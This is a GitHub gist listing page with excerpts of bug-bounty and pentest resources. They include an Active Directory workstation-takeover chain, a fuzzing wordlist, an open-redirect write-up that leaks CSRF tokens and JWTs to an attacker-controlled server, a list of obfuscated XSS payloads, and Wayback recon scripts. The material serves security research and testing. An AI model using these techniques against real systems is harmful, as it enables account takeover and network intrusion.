Skip to content

Instantly share code, notes, and snippets.

View kester824's full-sized avatar

leolin113 kester824

16 followers · 55 following
View GitHub Profile
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active January 2, 2025 00:23
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active March 3, 2025 14:34
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@stefanocoding
stefanocoding / csrf_jwt_redirect_leak.md
Created May 15, 2019 23:46

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user 
    GET /verify/VALUE HTTP/1.1
Host: example.com
@jhaddix
jhaddix / Testing_Checklist.md
Last active January 26, 2025 19:51 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@tomnomnom
tomnomnom / alert.js
Last active February 23, 2025 12:10
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active January 30, 2025 22:58
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@EdOverflow
EdOverflow / bugbountyfaq.md
Last active April 4, 2022 16:18
A list of questions that bug bounty hunters frequently DM me about.

Bug Bounty FAQ

A list of questions that bounty hunters frequently DM me about. 😄

How do I get started with bug bounty hunting? How do I improve my skills?

I have a simple philosophy that I share with everyone:

  • Learn to make it. Then break it!
  • Read books. Lots of books.
@nikallass
nikallass / Kali 2017.1 x64, Docker-ce Install script
Last active January 3, 2024 11:12
Kali 2017.1 x64, Docker-ce Install script
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get remove docker docker-engine docker.io* lxc-docker*
# install dependencies 4 cert
@mhmdiaa
mhmdiaa / waybackurls.py
Last active February 23, 2025 03:46
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@mhmdiaa
mhmdiaa / waybackrobots.py
Last active February 8, 2025 06:36
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)